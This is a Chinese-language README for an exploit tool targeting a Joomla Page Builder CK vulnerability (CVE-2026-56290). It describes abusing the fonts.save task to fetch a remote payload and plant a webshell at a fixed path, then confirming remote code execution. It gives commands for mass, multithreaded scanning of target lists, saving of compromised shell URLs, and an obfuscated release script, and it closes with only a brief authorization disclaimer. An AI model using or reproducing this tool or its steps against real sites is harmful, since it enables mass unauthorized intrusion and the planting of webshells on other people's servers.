BlackHat Team 概念验证扫描器,用于 Joomla Page Builder CK 的 fonts.save 漏洞。
POC CVE-2026-56290
作者: @mrzblackhat
团队: BlackHat Team
鸣谢: Peyman Siyahi · MR.PERSIA
此工具探测运行有漏洞的 com_pagebuilderck 组件的 Joomla 站点。它滥用 fonts.save 任务拉取远程负载,并将 webshell 写入:
media/com_pagebuilderck/gfonts/fbi.php
当上传的 shell 响应包含 Fbi Shell 的 HTML <title> 时,确认 RCE 成功。
支持单目标和批量扫描,使用多线程和即时命中保存。
requestsurllib3pip install requests urllib3
python3 poc.py --url https://example.com --insecure
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
targets.txt — 每行一个 URL。 # 后面的行会被忽略。
| 选项 | 描述 |
|---|---|
--url URL | 扫描单个目标 |
--mass FILE | 从文件读取目标进行扫描 |
--insecure | 跳过 TLS 证书验证 |
--threads N | 批量模式的工作线程数(默认:20) |
--timeout N | HTTP 超时秒数(默认:12) |
--output FILE | 保存确认的 shell URL(默认:hits.txt) |
Fbi Shell确认的 shell URL 会立即追加到输出文件中。
| 文件 | 描述 |
|---|---|
poc.py | 混淆后的发布版本(运行此文件) |
hits.txt | 确认 shell 的默认输出文件 |
python3 _build_obf.py
index.php 发送 POST 请求,携带 option=com_pagebuilderck&task=fonts.savefont.css 回调触发 shell 写入 gfonts/fbi.phpGET 请求 shell 路径,并验证 <title> 包含 Fbi Shell此工具仅供授权的安全研究和渗透测试使用。
未经授权访问计算机系统是违法的。作者和 BlackHat Team 不对滥用行为负责。请仅测试您拥有或获得明确书面许可的系统。
@mrzblackhatBlackHat Team — Peyman Siyahi · MR.PERSIA
原始研究及工具由 @mrzblackhat 提供。未经署名,请勿重新分发修改后的副本。